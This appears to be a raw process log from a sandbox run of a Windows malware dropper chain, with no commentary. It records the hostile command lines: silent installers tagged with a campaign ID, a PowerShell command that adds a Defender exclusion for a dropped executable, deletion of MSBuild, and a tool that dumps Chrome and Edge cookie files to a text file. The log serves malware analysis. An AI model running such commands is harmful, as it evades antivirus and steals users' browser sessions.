"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\riverjei.ehz\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qaqavt3v.h5q\gcleaner.exe /mixfive & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe
C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe /qn CAMPAIGN="654"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe
C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe
C:\Users\Admin\AppData\Local\Temp\qaqavt3v.h5q\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\qaqavt3v.h5q\gcleaner.exe /mixfive
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4e24245b-aaeb-474d-9108-7d3cab84b81a}\oemvista.inf" "9" "4d14a44ff" "000000000000010C" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Users\Admin\AppData\Local\Temp\oec0hdxx.xwe\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\oec0hdxx.xwe\GcleanerEU.exe /eufive
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2736 -ip 2736
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 2448
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000154" "c473"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 795913E3A4B04BD2B81FBA97178112E8 C
C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe" -q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\test.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 18928 -ip 18928
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\E53E.exe
C:\Users\Admin\AppData\Local\Temp\E53E.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 17732 -ip 17732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 17664 -ip 17664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 18928 -s 1600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 17664 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 17732 -s 288
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\FABB.exe
C:\Users\Admin\AppData\Local\Temp\FABB.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvazgmcs.10i\autosubplayer.exe /S & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\DF6.exe
C:\Users\Admin\AppData\Local\Temp\DF6.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8049.exe" -Force
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 20220 -ip 20220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 20220 -s 296
C:\Users\Admin\AppData\Local\Temp\396C.exe
C:\Users\Admin\AppData\Local\Temp\396C.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -start
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 22436 -ip 22436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 22436 -s 876
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 22500 -ip 22500
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 22500 -s 1772
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3476 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_B4C2.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff9bff0dec0,0x7ff9bff0ded0,0x7ff9bff0dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff601129e70,0x7ff601129e80,0x7ff601129e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=1684 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2420 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=2036 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2520 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=3696 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=2580 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=3724 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=3752 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=2580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
